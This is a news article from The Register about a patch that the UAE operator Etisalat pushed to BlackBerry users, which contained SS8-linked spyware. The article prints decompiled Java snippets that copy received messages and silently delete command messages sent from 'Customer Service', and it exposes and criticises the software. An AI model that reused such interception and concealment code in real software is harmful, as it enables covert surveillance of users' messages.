Feeds

BlackBerry snoopers can explain everything

Etisalat downloads smoke and mirrors

Beginner's guide to SSL certificates

Etisalat, the United Arab Emirates operator who recently pushed snooping software to its BlackBerry-using customers, has explained that it's all in the interests of network compatibility.

But its claim that appear fall down at the slightest scrutiny - or at least with a glance at the code in question.

The patch, which was sent out earlier this week, includes a file called Registration.jar, which appears to emanate from snooping-software specialist SS8. Registration.jar includes Java code clearly intended to intercept and make copies of received e-mail and text messages, despite assurances from Etisalat that the package is "required for service enhancements particularly for issues identified related to the handover between 2G to 3G network coverage areas".

Users first noticed suspicious activity when their BlackBerrys started experiencing heavy battery drain, which Etisalat attributes to "a slight technical fault while upgrading the software of these devices". Security researchers claim it's actually down to the snooping software repeatedly trying to register with a central server. The statement from Etisalat also claims that users experiencing problems - the operator admits to receiving 300 complaints - can dial 101 to have the upgrade reversed.

That may well be true: the software Etisalat is distributing isn't supposed to be reporting on every user. It is designed to be remotely triggered on specific handsets, before commencing its task of copying off that customer's messages to servers within the network operator.

The Register has been taking a look at Registration.jar, suitably decompiled, and Java developers might be interested in this snippet:

public void messagesAdded(FolderEvent fevent)
  {
  sentmsg++;
  if(fevent.getType() == 1)
  {
    Message msg = fevent.getMessage();
    try
    {
    String subject = msg.getSubject();
    if(subject != null && (subject.indexOf("I: response") != -1 || subject.indexOf("I:FW:") != -1))
     return;
    }
    catch(Exception e) { }
    MsgOut msgout = new MsgOut(log, this, msg, true);
    msgout.start();
    } else
      if(fevent.getType() != 2);
    }

...which is clearly related to roaming between 2G and 3G networks. Or this section, which (at a glance) would appear to be code devoted to removing received instructions (originating from "Customer Services") before the user gets a chance to see them:

if (fpin != null && fnam != null
&& fpin.equalsIgnoreCase("Customer Service")
  && fnam.equalsIgnoreCase("Customer Service")
  && cmds.msgIsPIN(msg)) {
  String body = msg.getBodyText();
  try {
    msg.getFolder().deleteMessage(msg, true);
  } catch (Exception exception) {
    /* empty */
  }

...but that can't be true, so it's obviously about enhancing network coverage.

Remotely installing spyware on users' handsets is one thing, but we would expect the snoops to at least obfuscate their code, not to mention that Registration.jar includes a complete SMTP client: ideal for avoiding any interaction with the RIM servers over in Canada.

Etisalat reckons they have 145,000 BlackBerry users, which means that 105,000 of them (who didn't complain) may have got this snooping software installed and running, ready to receive that coded command to start intercepting messages when someone decides they're worth watching. ®

Internet Security Threat Report 2014

More from The Register

next story
Download alert: Nearly ALL top 100 Android, iOS paid apps hacked
Attack of the Clones? Yeah, but much, much scarier – report
Broadband sellers in the UK are UP TO no good, says Which?
Speedy network claims only apply to 10% of customers
Virgin Media struck dumb by NATIONWIDE packet loss balls-up
Turning it off and on again fixes glitch 12 HOURS LATER
Yahoo! blames! MONSTER! email! OUTAGE! on! CUT! CABLE! bungle!
Weekend woe for BT as telco struggles to restore service
Fujitsu CTO: We'll be 3D-printing tech execs in 15 years
Fleshy techie disses network neutrality, helmet-less motorcyclists
Facebook, working on Facebook at Work, works on Facebook. At Work
You don't want your cat or drunk pics at the office
Soz, web devs: Google snatches its Wallet off the table
Killing off web service in 3 months... but app-happy bonkers are fine
prev story

Whitepapers

Why and how to choose the right cloud vendor
The benefits of cloud-based storage in your processes. Eliminate onsite, disk-based backup and archiving in favor of cloud-based data protection.
Getting started with customer-focused identity management
Learn why identity is a fundamental requirement to digital growth, and how without it there is no way to identify and engage customers in a meaningful way.
10 threats to successful enterprise endpoint backup
10 threats to a successful backup including issues with BYOD, slow backups and ineffective security.
Reg Reader Research: SaaS based Email and Office Productivity Tools
Read this Reg reader report which provides advice and guidance for SMBs towards the use of SaaS based email and Office productivity tools.
The Heartbleed Bug: how to protect your business with Symantec
What happens when the next Heartbleed (or worse) comes along, and what can you do to weather another chapter in an all-too-familiar string of debilitating attacks?